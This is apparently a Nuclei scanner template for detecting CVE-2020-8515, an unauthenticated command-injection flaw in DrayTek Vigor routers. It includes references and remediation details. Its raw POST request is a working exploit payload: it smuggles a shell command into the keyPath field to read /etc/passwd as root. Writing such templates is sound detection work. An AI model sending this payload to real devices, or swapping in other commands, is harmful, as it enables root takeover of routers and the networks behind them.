49 lines
2.1 KiB
YAML
49 lines
2.1 KiB
YAML
id: CVE-2020-8515
|
|
|
|
info:
|
|
name: DrayTek - Remote Code Execution
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected router, leading to complete compromise of the device and potential unauthorized access to the network.
|
|
remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1.
|
|
reference:
|
|
- https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)
|
|
- https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8515
|
|
- https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html
|
|
- https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-%28cve-2020-8515%29/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-8515
|
|
cwe-id: CWE-78
|
|
epss-score: 0.97079
|
|
epss-percentile: 0.99723
|
|
cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: draytek
|
|
product: vigor2960_firmware
|
|
tags: cve,cve2020,rce,kev,draytek
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /cgi-bin/mainfunction.cgi HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022040f06f4fb49a6b2f018ecabbc9e04600bcdd64f3b21b15c113c1373760d137a1022100d4e459f4713dc989c17fd1a5abfc9a27ba401bb8039f69cf8c3b9092d4906d5c:922c64590222798bb761d5b6d8e72950 |